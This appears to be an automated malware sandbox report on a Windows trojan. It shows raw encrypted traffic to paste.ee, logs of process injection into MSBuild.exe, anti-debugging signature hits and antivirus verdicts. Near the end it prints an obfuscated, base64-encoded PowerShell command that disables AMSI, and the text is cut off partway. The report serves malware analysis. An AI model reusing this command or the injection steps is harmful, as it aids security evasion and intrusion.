Data received –Ibý„3×DQ¶7(CŒ‹c°+‚´3‰òÒo¯üí ÌJ•åõ‡w'ÜDÃ, ‹êùG±ÌžÎ ‚l{¦|øûé¡CwKÇ݇5Ҝ\ìæéêšœï4ò»ƒ !¬æ¶7ÝeTñU¼šå$è‹bz;ΕçMĉšÙU%Þàd™…V¬…&£F É5E<tƒ¶–e=ÛK¹òöÞ#ЂÜpž„-ÇgáÉ0 y—“|Çú·PÛÊÃ]Dþ0ÉÎL^t ÞÒpC¿bWÈ­Û&žÓB iTŽy‰ª¥?> ­þñZ¬Ùc®ER²ß©q!QsÇ* 8~Í/í:)pYåè®ç`š+”(T@5wb™%Éy ›.¡ •ÊQCiÇ×q’çÎV&1Ñ8‰%B¥zK̎ÕÀ×vêŽßçÓÚ*ü ©éõ»…\”®ìâQúT’sWœ‘éÌ'êŸÑÌä6††úêÚo@lߗ/yѳZf¢Åº øՏëùxo¼·ï|’±“ÚŸ¦AS7™—ݨ×0JØg”õ/Æ óAvxw´ssAó_oôk ·æ¡ÎÐÐF—‡°ËÅ Öê»J†¥£ #Ã4B^(dÈş!êU½²'!ž¿mK f˜ñÅ߄¡“„,m
Data received 2P‚ðš†û§XíÎۏ8¦¿–…Ùàš¾è¢RgMYH Jدæ(K¸ 6pþ{=șŠY(wô‡P|^zhYÒ9Dem9•µFyoBEóî ‚ƒÔ´­ŽÌÄ7£íÎP±÷JÅ‚4].å'Pð #’FS6ú*#—GªUtÚPÂ/Rc^ ù+Cí.MáFeO»ƒ¸<dsq‘Gêñ:ì ¢£vNφZÄ,ê͔DM® cì—YÿÈ¢°'küÿƒò-“²œ_æŽÔCª9k€"áݧÆ0‰Y m`ÓÇonuysTÞDC> 4”Ã)ݧ™••Ò˜ge(ìIC`XeWS/@j YÂÚØ.>8RŽ3ÖzºÚԎ/ïëOØ1À"d“Ù¼l.@NŽí“‰¬öIþIï>My%gšo±„Dbë-gîYžBdÞ¥»Û¢·U¹©9FÚ4Ÿi ˜ÿ5eÙ+(nöÿôn°¼'D8ÓTxý„5SJ*™ù•R§þ¨xö€ô ›Y[÷÷V9cBŠéI›Šû~k €šá4•#ïŸRjz@öôÇ ôêÞZïlõŸý«WX±6ÆRڠː+kâ”Ö‹£M˾) ÉƓb³É«Î.«•‰ý®žÝør¶¤þ„³¦ÞpLÒ¼ÕýÛ·s’s~² *† Ž_[´‘êH ¯ê}Ðùe5]"H’yEµåpxº ðëùè sQ½—Le·™ ËB¡d~ÃÍs0ïÐ.\ù0ÿÃMxÒöZõ¼N¸í$‚­Ámísዢ†K)ž¯’ eÊk’h`øþRAÃã•R°A¬àƒT;¶¢å±Ø÷† MDý£q|$¬ÂÅýh,ëBžÞšˆYÈΤ›T«w׿>0î‹5R˜ëšPpû¶cæ ÐÖÓDå†Gm~ êA.dÙv=¾Jíl@)[y„j¦–±Ð”— ºÃd¼y"µ¹hY4SÜ-Ú \$IF)ú ¬7å“L¶™ œžæ*!ÏÎùI{×@²ð©sW•µwÍF æF¼ïýypYâJ|F"ˆy:ÎÙ²¹ÌJó§@KSQ¦šè8–•^äD‡/Z.¨Úkâè%$ªw±O©
Data received ŸÊ@Gµ¼ðz# Z9 Œ6?Îà< Š5˜­`1ÞKŸèLF?Ë9 UÕ÷œ»1ݝãéµnó¹Ҁù|Qé¸îº‡¶ú~½›U¢‚¿¬0“vcp/J‘XÉâc$}Ñ·waEgkå0ØH¤‡³a½.Iÿ¥bf&7 Í|ßéBOü3i¤rï„n ž}8Ju2ùKîf\óŽ÷¬WϲšÞ ÒÐö=Á¦ëHi°YdìÃê/îèg)kO•ÁîëÄâš. \Çb]F.{š6Y¯K‰Q%ðq*‡¿«i/kû2h#]ÀqŽÉ·7:@{öäXþRÀ›‡ð¯ñˆñý² „™ìv;΃…²LŸÚˆñ[ê*¡—ÈîÔ.w€›ÿ¡þEgè¾®O[%KûòM\üu±¿ ìÅ¢šIä ’,|ôû€£©®³»ï gðÁñáE,ˆêt!~Þû»5ý :ñÛR$°ìñòëÚAÕÇ©/OV–ZÛMt¹cḑù´ªñÌ9Yoøvik,kîzØ.¦É’çÜ%‚Hã.'‘0¡—#j‘Í £ÁWº#óõO…HÊ©±º¬¤p¼dµ‡ÓNqR°g¢ãÃÍù=óù°0_î&𬦩 ]ŸŠMÀ-a‹À¼ö¦½x°¦RFcŽ yH:þÅ ÷"K='·ÊÌêÓP°Ïgù6½;³øÁÌÑéËÎ2{¸Á|’Üû飕ÁN%Ò
Data received œ¯º×Ü;&¨Ø7º0NÇöÜ¢Þ  ´²`UÇ"› ‘[»Ž,rĤqJˆêhƒ®{Ã÷*–ì!4ßÔô¨U@/®`Ìí6#Gn½N—DrULp̟‹Ê6Íx ZY–ŒvF<…¢uА٣žÚù¸ôIH5&J: ·´"ÂÍAچHkjb ¨4„®›£‡:hrö‡Äî •3G7P‘¡°ºC)Ò° sº9´<Ð=×1a£‚uø¦Æ`EÉ0÷²\羈 ¤ŽIˆÿ%£~Áæ*™K RIVøLÎCgùDùÄ#Þ°#Ë÷$cÈSߊ×­8ªŸqYêhp¿ÝÝóWŒYóˆsÇ šõ/ÕyŒL$—ùrGuº Ï}Ó}¸™Z‰ ±|{ÖJ嵧¸?¥]ëÞÞD2`K|z½mÿZCÐ^žHÑÍn·|rÈI±17Ì_±(êØ9~­@ùzÑ©NÝþ/o2«øÇÕ6oÃJó2õËØÔjÒ¬S,~ÂUk†N¯Ì€µï>°âdÉQƓ鎂}Œ¬ HWnÌÞ³ÿrA¥YÉöЬòé$‰¯w 3 ®HGº\t0yõŒ(û@\ÔoÝóŸLŸW•eÙ{ \ˆX£æ .VÍHöhÏäáæ!xc”ˆW–íài­»G¯þRЬÂà‡ÿ ˜—piAˆ+÷õ…Ãû2Ÿò§B ÿ?IàÎd(JzÜb¹ £©ö²zJã¾{y:¾«{u¤Èš?A_°Z“šˆàÉyÉaPLã9FŽnc^[•ÚäǪjW-{Íç½õšÓWöÿ!Ô÷åºY?l°!“ñ¦Û;þ¤+M„Áú¢Ê*stúÍýÖàhÈ"å~?> £ÀØ2o-¿è&U‹‘IAàÈŽ2ðÎÏЍùöömeD–hâõì&‘“^¬Æ:(^ïÙØè㊡¯<«Á÷°xŒ'8³gþ]¦C:-€Bš–Ëô¿go=miëQóF鮈å<Oé>{èê3Š<ù¨¶ê V±giáo" }†ûFZѽÎ'T5€7) ³Ïœ>mŠ…n9ÿ" ðM„|¦Pœ SXIGbú
Data received ÇùÌMÏiÝskOðþ °¥@É-.ó» å,m¬×r&PòÍ9vŽàé=(EeÍlÎf£@ a륔÷’g˜V¼’|qŠqö‡|Ýg::’N«Èî‹gHh·r E£À?HLŽà,>Ó`ò…,©d×S .«&òùíhH(êVµ²;…Ú¦ÅÒ·ÀAhþÓêræe]ÂÔ,`Yh‹Mþªn\¢Ê|°M"Œýߝ“±¶9öÞ¾-ÆѹðoîkJƒbi #z„5‘ã®ny¯ƒ›™”D‹°ä¹%¬›ñ‚¥nãwÊÝÛQ]¡ggóæ)׀ýä?3~)BÁN´vжƒMÕþ9é°'ÿ]’øãZ±fà„Ü›(€m:P˜ûšbûóüSD1wx àp`\cšÓ™Ng .Oµ@ 8ê\§:{QsVéíÕ´ÀpùÆ ˆ|‹ž˜¶CÊEq'“\»W€“N{D®`žÂU©ß±01UÒW‹«u_Di;ؙ•œŒoã.ÿ=b.Á*%ít­¸›{€ÑÍæ—È·0I‰ ù9]j!KoŠº1: -Í"äž3Ž°…ÃÖÖRkJ½¶yzOÂÐîÒëí>G»pŃe³*¥>;má.@ú_S!AÄ!P*ƒb @ƒÕ#4½Y¡V±Eá…aêúXÃ]D¾b²ö“L.kZBo®«B{?Û[¸óÇÁµó¿ˆh¾eq]Ù-š/«¸¹T;qŠ±‹|Ä]¢㥗o¿Ç]ÚÎ:õáš¿(TV(]N Ñh
Data received fg\ Z ޝ/ü'co@ôž(%7k|1¯“ì„QE¼<ùçRY±ž+¦–=X§ø°Õê©­ÝEá+fÉøWº¸?þ7þ6®QÿeÁð•]¦K‰B™«ˆ†IlG¾º)äðŒhW¨6_Äí^*À´ýÉË0bñMåáQf'‰ ü¶ÔÁ/ ¤“¤Ò¼Ÿr)S× ¤«Í…Ý“ßôáÞ3h º 5uÃzŵïÿßU{ïÓ&4Pb@ª0ºsá'ýEöciì¯û×|™;f Ë·êJ¤È…ÃdèÉp»¤Ä{{cô‡MԂ—!xQÙø£ñ<ªrՍá›ôpÀQŐQûރÆণW. ­·@ ‰¼!CéêÚ×2”qó;z¡g.Ñ¿Aƌ””ñÁ“;¾n֋yæõC\®òiw¬–EsûXÞÂ%¿„7šä©ÏAäºê€Å ÂÑü¬ÆU6ÄÞV¿†ê«´Ûì1ëlO±ŸœY¬yy‰_ñi伍§Akæ)mª¸„MŒÁ%B[é˜ÒÁë\þÍfXm¡å­Zní ´íùŽù”ÕÜ?R[~ögñ þœ©µçjʬÜ ?*-q‹lH ýýû+¸ÂÜáõAE€Ç‹rÎé֗â m=¸ŸÑç;3CUzyùûF˜\),ŒÌãĄZ<÷G4«Fè{ü *-c<°«mýÅfÙäøz»JÞÌ°¸å­æ(™J°& îƒ&®ôajÝ UöS¥Kà÷Ááâé~O:QKrvü{ÔÏ‘ہ[ìÀ¯~À‹Š›®!Å®S!Ìw‘’‰ø‡à,*ïq”¿ƒ '÷rO-¸²ðgN”Nå§ðk“74Íç›<9 Á¯ýàoö¦YYÍ®ñ¼+¡#W’ÆÍ¥<ji "fD"ËílÚ-‰Ø¿fÈ/Ä ; Ø<–œq¾šÍݤ„°;yÓ%þSx}gÆqI8úÇØ
Data received 9¶Ùµ(žŸa!¼7fÂk5P¹‘D9OäQ÷÷§U) ¨ÃõB¾Õá;;ýŠéòëæÞI†œëˆ‹¢Ã1ԍ 8< ¡!3g¶çfÇápµ‹ÍŸh´gòà8ò@øĤ~€ŠÖüÑò„sŠÅUÞA­‰\E£kò€'Ý{Öd"•fí…ÆH%%¦)f]âËîU˜kCzá'wß16[ìmåBU¾évöøˆxbg)¹ TԤߌ(œ‰apdìç HXaW¬“”"˜Mãƒ. 0ä3$‹iگDz.êl§)òXa‚È„ œ£íGæp<ÀïÐG7.zc޻ȋMùCØWs7½ûâ$† _L/ƒhéôscú˜¹™JÛ\ìà*£}€Â>ùý¨l§É]à¢aé›MÕøRñknaÒ[«L]ž=òâQxMwQÓx#ØŎª²ç fé2Ï|Æ-n;ە¼34Yq+¼»NÕ¨F<‰µ\ZIуPÐë/ùH6ÉÙ¼]™Ž‰Š2<ùÌ¥Š3oucïÝH§Ð¨´5ËYÈ÷ ¦q§»ÁT®Õ P•nۇ&Mz"™¥ÓÎìX%5Ý¿š\\BÖiEz—›ýX#<¶à0ùŽi aøX4| ù=Ërò–ÄÕʯËÉ ï‘kÐ҆ÕÞdú2»¥](±iø¬w§Ù:Yd<¡d°e핍/wôˆ¯™Ó=$ð|¯1X€Gò¸Ã{{wg@Oq ±ªÆ=ýR{+¬ƒPRZ=ß"™3qÇV¢I™ï¥eƒásayÐ÷vA9œ98ϵЭ‘LŚpá›Ìþ4—›\¯.’HújZŸ<ž“\ÔÂEÄP[nx°âÓv”L#½…“¡-SžQgƒŽYQc=š·r’¯o‰EúÖBÍ ƒŸê Ð*•b7«c{<Ï«úÏÜ7µDÂj> Rãi¦*Z‚Ó#½}*žÓ¥éöI æªÍŒ‘u'=N~¯Â‰›&ôJ9¾AhodáJÍ9=[ˆ28 ÈãfB À½Ã2Ãb]9ßg•L"–éª½Ùm٘Ïõ‚¹n¦j4")¡Šà ØK.e6?ÁÙBBê1^I Çt®›1ìê—.Žœø4+ÕëpÝTó¬9‡{9žMmïd(M<Jµ³Ì ­DÖe"kL½ÑWgPS'¿È×WZ —oarâU¤ò¯dó‚/ÐÝãwíJöÆZ1ûÔmÉ}ÖË7ѵ(ÎòP~or²µüsPœÄþŠßÃJ‡jP:$Îsbß¹~ن­"­Nq+Ë hÁ®,÷éP”nÐÎPØOˆËËL—B™¥Â´(%Ihë<eÏ·AÒډŠ‡?Ç@‡1Ք’_"úƒŸêy©_u¶£#‰ˆˆ ߕg*zk •qÀ5•C@xô# ˆ! óIéõ™eeEJxð:]kÐßSAQ©ØÖⓗEzóKXÜÜ:š3“4Yƒöp3LARÇ럒Ðh¶µ;Ì.'½ÙБ¬Ò:cÑnÑVÀ¨è²|3G')«œåŽ4–ùã‹än¸Ka0,Æ=ÇãÉW=åÁ½ÜG駄-…)›lA:ìÍMÌkë‘ð55ªx¦^ß֐ 2! 牕U=ÿH5QÛŠ5v„¹¦ÁpÆ[í^‹l·ó¶Uå‚×í î=ôFd!ý;¦¦‡Î%"Êó¯»ëç Öù%ýøçbús3ub4D^¿åIÈ;ãìJÙ¿@ѕf¡¿x–ì!ú…¢ôµéOÛFEÞ`CqdI¤ým ¿ýWi
Data received ·äCÓ(LÑÃLÈü»GT¢8:ôòõtâ)¢Ì}gñIÊÑcj T5ë>Úèànþð¾”ÒcDzua=d7 ð@wõ|‘îâœ31Ϋ+r3?|ÂàQŠ@“ª¤{°ü½‹–odõU ÄÇPǑIÌæzó}÷%,Â"æk¿ óíŸáóä¶øuhêcW%@óš¡(M$ˆ(2_2*‚œ?ÖØëÉPÑA‡ 7 £Ÿ¡BD&™„)›0 Ü Ü¬ì›W w8&ú|ڛÃ%o ‘k ·°‘Dò6[֚dÚÿÔA»÷Bí]uìíéïR=¬¬ø,Lž‚ñsä òp(íæF;8…uÉ¡Â@Ä4z (¯jL=t†^ŒŒ6hUàUÔù7çïk°³•m¼óòuWÙQG)8µøÍð‘ ̓Л’n¸7–¶¿;¿Ÿ2* y’1q68T1Þ`˜+2ŸãC#gˆœ5ÃÖõŒî!©üKK«6¾ÊŒüÍNy©äo#WUÍU7š`¹“¦$'zudÇa¶ª\{ÚKEÔoæçÁ8ãZ…êõks&Áí²PšÁ³Q4ÇrYQDeÞù1=K—Œ`ƒb®Ø¼#X6ÅqY•[zaX9ˆ ð.ØðI<<éh^—¬ôXì½(ºJ`ô‚æNß9ãïåõH*°®ö?ur{d§™¤›Ã?|¤j)ò“Dêh$©Å9Å룢m^{WeI4kè÷ Eí'’ 2OÒ]~tԙôóF²GGá)# Üb—fÛÛý·-ÄÁlT2†öB†©‰}¥2 øºÙ,7è[/€ÚXQDó¦º+©Ì…à I@ñ}&@UJw7¬&ÍI|C€˜š~hl œj9”·ÍÂÄÁU<Ò]f ”ÇHð#zb'>Í>Hˆ’ÌŸþMCk4Rt…šú6ûn.…QÛ~‹-% H’óî
Data received -›R¥4ˆÊ‡þÃóH†©Ûâh¿×xdçîáä»VI%|h½³šJ8ƒ%Q»¬ozfXO dgœ_8ÈóÔÇ ´²ýA¤Ì¸þ~sTË2Î:ÐEÊö´ §¾ÉGt9%pŒ>º‰èã°ý!¤™Â¨ûÒ¨äã9À-«ŽÛ…0<R׉¼û‚•^?‚BײŠ!-óì‰*ńÙ ò kŠ_•¦Tœ"½ûš¬/Üþ„ÅKY@†eoµj‹Î èöµ „Á§J–¯s‡ŠÝ¦¤Oyÿ¥×Ù+,Æk£gälô™làxiœ3wZùØÅʜIÜÆPÓgz^Öó~O!wžž ýLQ¯°zÞ·,yÓîãÙÛù&É;ªÈŒ4ݏtÞ_Œ•þ-â»U5ö†¬k5Ü%'°tAÏeðÀÊMf%4^ùAžåʏ²)ò8J]kj˜eƤ¼4cìrïI²­ß*ÖZ}W»DÛ¨ÁÚ¡u6V‘ëšûS&¬zУ±ÆIӟ][âqzܝ“?>‰V­ l÷´xëBÙÎCƒªþWl=´JàÀE~ ØË)¾&i0´Nj`3Š³tT_eÀ;žîÛInî$©å+Í+ø¦OÚn,Q~à•Lž£úPøNÅIá)zR_ºÀðÍ6ޚT]>Ý ·œjÔþÀu0××]r–€Þšå5 PÖiìvU}\óÈhGÈ>¾§ó×(ƒƒK EI46@¼@;n¼#±;~AfÐoÏbT`ñ Ê§  JY‰µ"l+½j«ãU¯Ä°äÕn(͐ÐìlÕ§¦r {꽜ÃëjŠpÌ.Fò‘
Data received K4œ4&÷„ë°HB牨‚8Z_Ó¹ d1±I„p‡ñ$Y@(w Æ(^öß!@"xE!r°låÎaS$3*4V‰Êomr‡‘wȝաÍèv˜ï› Âïs²¨-¿i>µew¯ðx*lÙw7…à{­ŠASú‹R•† ՐÑб€±çpž÷ع²`à!cUfÝ:ò0?ÕÖ:¶¿àq¬ Åàr?4TjåӗÐAºäÎj·7<ð1/F3š´IzÐÏ ú¢kCRÉ⊣Ҷð­@žŽtG8՝JhwµáϤ˜"²¡,ÞÞFÆí¼¦œ•P›i3”K|!1]È»ášck0E®Ê§}Á"¤%/£Ä+œeá¿z"K&Ä<&[ e‹ò».ú7eƼð¯¨åÇ'Êí7–¯”ÚèaëDP;Ó3=ö¡÷ÈSbncëô³¤•xôÕhVe>A×wÞ®§E ¶'Lhÿý#‘ª™­îÚÂOËv‚u³²yc¸d$úïÌðCúÞÚQó­‡m ,¸”ªfÔËãñÞgL¤Òé “"þñ BúM½ÛU»õ­ž¿¬ ,äP¸Ê)ô1Àt*ŒªÙ"Û\V-¥aý¡‡UEv*`Ôn–W­v;¤Öfš» >ïPZ( íÏݾØN8ü˜w—éç¹Ï¦ ¾«ò4À»)Ñò=Gz†ðúÓ*½$¥'ZùZ[Hz溥° ïœð€{•dÍq|Ùrú(Z–;~ 7€ñ%ÁZY>¶D,¸7cžo8Z¯ÙpºÂt¦¯P ­áºâÚؘ{>õñ²–ÓõgóÄÂgÇ0L½™Ñ<"WÒBà’™çl⡲5–NÇɘÐðü€‡FÖkÓÊ~<ÉÝ?óÛLc³Œ›;×oº¸ôÀ0 {\“È3pXïp¥rºâ0.W浺#!þÀÆø•K_ž$X¦¯c:K²)­üƒ ]ê°3söþ¹`Æ_trc}U¿K¯Î$Å#‰*¥ƒ¹åZ NM°?]ðCìT ö
Data received ýûŸ;~áfÈu1%êz¼õÖÚ×MТÃÅ|ªGpXøKîsÆÕ::íqA jîMJ8Aõ1³ß<JwÇGò¨Iƒ{ï.Տª*Tïqîtä0µÞÌÍ@Ìx²8Ø:÷kcOqqÓiú!ªJ>ɃJQ؇—IºŠoÆ^”Ô`6æZ׈Z·8ïZùêÅ°Þ30"QN–} ‡­iÈx_U½2B?:'G8ü?°Lí¿X’wkôد ÚP¡þ΢–þíÁ¯P &FYöî×¾NKª2XF¾ë[öV®CzwbēñÃ<sö¿å0ó0ûÞ>/w_ MÐÃ`GúÏÆ V4™7a€²J4£rÜÎJãíòµà3㕈߃çÕúÞMŒû¸™ZPüuRh¹y¤s쾦–\Lë¥kÈrä¯eOÚÜèyE"/9ÌnåÚz² OOÈbå`WîÁ‡@“VçܸK‚özgÇ8¹c„Tì ¸Xô5û=³o_†I?ܜ¢{™=A0ßò â fî&Ïäb±§k<JØO¥Ë÷à#[Tfyð´ íŸEêÓGçójá<îj8½€Èjýd¯°rA;¿ÉºQúðQº³9ÿÄS®ð¡‘Š¦‹ë‡üqøo"eÇÛsòÇ;;•û3ë ¬°¬(´¤8†‡Y|Öoil¼¦ÿžnô b;¿WpúOÁ Ì mìBuQÌí•!S«j-ƒ ;ÓVÿTâ¿ {=
Data received § ‹‰;¥'r%P *®lø © ÖÿþÇuŒë?¬+hàV´=¤ïlºß½H î¨êkö ÜdÁ¸ºš|,ÜH4ðJSSڥ͊ÁÌ|ÖèØ8æV[EŠÒH†|zf£~àmŸz¯¹+mè`vÈ_„ˆ«H©Ž£6Y‘òÁ´^† ÂÏ)N;`/úHø&šéÒ¬6`̈³Çò¹Ÿ§|0.wvw„_UñÊ2p\à¥%R¹Ÿ©nëÊ B·²Ý N$d#fV|.Wß Þ±«]ÚÚB;¨Úҁ»³æüx-©FH0ÇXvSD̐Y!Wmip®RPœb/ó±{RÓ"ÄÄYÎOKf …åÛë«¥=Ð2ßÌó=­ Žápi4ÅiȆEº}wàšKÇtÑù¸ùŠm “¬½ð¯ü³s}h¶¿Ý3>Š/ât>û¸‰9üæŸx¡)_ªäj¤ýzÒW¦02fõUQ‚ÜUî38ëü€mw"„L|² Rê×ڇE(~¬Ü:P‹ÑA§›º~œÒÖ3Žo½½xó Ö«‡ß©,‹Õè H?¾MÑXl“P@2 — Þ'7®Q™û'×9¨‘F-k>ò ää(…²Aç¡,ÇŽ– Z™ºmϊ:UMafk@xš@éâØ€ÎnÃ4ŠËdpõü¿2摛独jmë%A‰–xԖ…“S­i7ƒRƗm¿wLkð¡–W0¥ÿa_¼ÍÜ "JÌW뵅2{Ciš)[wü.÷ñ ‘dÁo¶‚*þ_Æÿ—8hMòG3 t°Í6ù‹D1$p39¾ÙƆ™TmÈÞÉ‘Nž=”Î=àEa3ä­Pvèãw ¼}þÀ)’ãH)ӅJŸmå ´G+ÍΜQ+Ò]Ù싳oëqÁ ßG~Ôß&9Z؎-zÛ\´Ô-¦×3,›ÜwoBƒöm‰„Ô)LàlI=µ‹W˜ŒüuĨÔ`0ì‘ÍC) Li×ZCl3ë–ÇW9Ý_¬rM„_¯°pS  Sà6E+ˆã<^ìUj_VóuÂǖ~}–Ž’û/™ß0q˜l'JŽÍG>S4¨ü‰WX“‘ÁQôF˽\Þ¿PèŽÒ¼^:øI`íå S¯þê#Š°›S2%Ù
Data received ‚*áŒæYy) ¿ýÆwY<LUHÄ[—C¨çS^ Ñ7%ò¾*EnµnÌS£†<®"–ݪuRõG5èú=åø|íì ΂7lRâ…jÀþfÎQEûë%Èzž »dB çÖfdèKúÒitMØíT×1Ið~øê0é,)ڐ_²IJ¾Ì9Йœ’À³ÀµÕ¸<r™ôí®¬vÖ= Z5 ë=îh_‘݇óðêàJÈÊò°%nçîÈnæÚrY‰žhMV ¢:uÄñݕ–Gh17jS=Ž¿[hµBk p{[ÞMw­b“÷?}’ýoñ ­BOš°ùSá ý#ÀaçF{š-±Áî@ýë àÊKՀ׿ÀÕ»Úºê5)̽;ô~·pæ±—Úóª7ä¼ÌpY ümÍLðËqÛˍZ‡¿ž·“¨5ÌÞ?’›1z¨61Ú¬ÓIR=;?à…“Ö%3dâ Zk·­ÌÒC{VYœjÇ%vW}·1‰Ï!¨©<á\ŸŠºÂ=Òs .ã(×£„L41ú´ÈY$¿÷1žËÆÀäð¥Q>âI&Ç_-I{›Ùøª1,áÉùÅg"óúÑZPHg *±A AG£©åõ»4ïnñö•oؓäWm:öH¥¥¾váQ ô¹ó”Í…3 \¨Iþ„æ6ƒI¬¹£
Data received 
Data sent kg`1šÂìrr{3ï¥BßÈ-@-îCå¹Y@—|ýT(zà/5 ÀÀÀ À 28&ÿ paste.ee  
Data sent FBAb¤‡ûÀÐGõJ¢ÇZèïˆDC*©x°g½^í#ý¾=;âúà¨éØûmu%C°[Lêìr‚眘¢Ž0¬²ÿÂüZü[üSÑld¸‘ºk…ê&£:›UQï—ôtÃFtÕmŽ`¦TeL»
Data sent ` Ä5Áɤ–ò$çA>ˆþA¤3˜’6«–ÀE-ò×î¾”WrhW»ÝâyHõxQ¸ý jÔ x›— ™é.}óýŒäÌðƒÅèzXÁçàEQtI¶AÀF6Wb¹
Data sent @ q®ãlÉ®óX)( #-ÖF•ù–m­ý·#ww[ˆ6 u§Îè4"³öŸÓĶYƒ‡.) âÖd“å„TÞ
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
host 142.250.204.110
host 172.217.25.14
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 3752
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000036c
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[à H€1)@ь.text¿~€ à
base_address: 0x00400000
process_identifier: 3752
process_handle: 0x0000036c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 3752
process_handle: 0x0000036c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[à H€1)@ь.text¿~€ à
base_address: 0x00400000
process_identifier: 3752
process_handle: 0x0000036c
1 1 0
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Doina.7139
FireEye Gen:Variant.Doina.7139
Sangfor Trojan.Win32.Save.a
Cybereason malicious.f67eca
Cyren W32/AutoIt.OR.gen!Eldorado
APEX Malicious
Kaspersky UDS:Trojan.Win32.Povertel
BitDefender Gen:Variant.Doina.7139
Ad-Aware Gen:Variant.Doina.7139
Sophos ML/PE-A
McAfee-GW-Edition BehavesLike.Win32.TrojanAitInject.ch
Emsisoft Gen:Variant.Doina.7139 (B)
Microsoft Trojan:Win32/Fuerboos.B!cl
GData Gen:Variant.Doina.7139
Cynet Malicious (score: 100)
ALYac Gen:Variant.Doina.7139
MAX malware (ai score=81)
TrendMicro-HouseCall TROJ_GEN.R06CH09DM21
Time & API Arguments Status Return Repeated

send

buffer: kg`1šÂìrr{3ï¥BßÈ-@-îCå¹Y@—|ýT(zà/5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1488
sent: 112
1 112 0

send

buffer: FBAb¤‡ûÀÐGõJ¢ÇZèïˆDC*©x°g½^í#ý¾=;âúà¨éØûmu%C°[Lêìr‚眘¢Ž0¬²ÿÂüZü[üSÑld¸‘ºk…ê&£:›UQï—ôtÃFtÕmŽ`¦TeL»
socket: 1488
sent: 134
1 134 0

send

buffer: ` Ä5Áɤ–ò$çA>ˆþA¤3˜’6«–ÀE-ò×î¾”WrhW»ÝâyHõxQ¸ý jÔ x›— ™é.}óýŒäÌðƒÅèzXÁçàEQtI¶AÀF6Wb¹
socket: 1488
sent: 101
1 101 0

send

buffer: @ q®ãlÉ®óX)( #-ÖF•ù–m­ý·#ww[ˆ6 u§Îè4"³öŸÓĶYƒ‡.) âÖd“å„TÞ
socket: 1488
sent: 69
1 69 0
Process injection Process 6096 called NtSetContextThread to modify thread in remote process 3752
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4204849
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000033c
process_identifier: 3752
1 0 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZ